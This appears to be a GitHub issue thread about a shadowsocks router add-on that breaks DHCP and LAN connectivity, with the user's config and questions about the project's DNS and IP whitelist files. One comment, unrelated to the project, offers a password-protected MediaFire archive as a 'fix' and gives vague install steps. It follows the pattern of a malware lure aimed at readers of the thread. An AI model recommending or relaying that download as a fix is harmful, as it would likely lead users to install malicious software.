### ISSUE TITLE
Lan dhcp and wifi devices drop connection

### ISSUE THREAD

**Issue by UnknownDef** [Acris/shadowsocks-asuswrt-merlin#60]
Help plz!
When I start ss-merlin , wifi devices cant connect to router(cant receive ip), and lan devices with static ip drop connection when on/off device.... 
when i stop ss-merlin problem is fixed.... my conf:

```
# Route mode
## 0: GFW list.
## 1: Bypass mainland China.
## 2: Global mode.
mode=0

# UDP support
## 0: Disable UDP.
## 1: Enable UDP, require server side support.
udp=1

# LAN IPs
## Configure which LAN IP will pass transparent proxy.
## Default is 0.0.0.0/0, means all LAN devices will affected.
## You can assign a LAN IP like 192.169.1.125 means only this device can pass transparent proxy.
lan_ips=192.168.1.0/24

# China DNS IP
## Default is 119.29.29.29
china_dns_ip=8.8.8.8
```

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by UnknownDef** [comment]
> Hi, what's your router's IP address? Try to set lan_ips to 0.0.0.0/0 and try again.

I try 0.0.0.0/0 and no one devices include WIFI cant recieve ip adress when trying to connect router

**Comment by UnknownDef** [comment]
![Screenshot 2024-08-29 212651](https://github.com/user-attachments/assets/3c535cac-f5be-4955-a4c2-740331c006b8)
so i have big problem to download from your cdn.jsdelivr.net , i spend about 8 hours... is strange because i have 500mb speed...

**Comment by UnknownDef** [comment]
Acris, may be i can erase this file ?  it fix this problem?

**Comment by UnknownDef** [comment]
> No, you can't erase it. I've changed the CDN, can you run `ss-merlin upgrade` and the run below commands again?
> 
> ```shell
> /opt/share/ss-merlin/scripts/update_dns_whitelist.sh
> /opt/share/ss-merlin/scripts/update_ip_whitelist.sh
> ss-merlin restart
> ```

so i erase it and all works good,  but after any hours leter i cant go to mos.ru , so how to make this files not update ??? it block access to many ru sites...

**Comment by UnknownDef** [comment]
> it block access to many ru sites...

how i can correctly disable to update accelerated-domains.china.conf and dnsmasq_gfwlist_ipset.conf ??
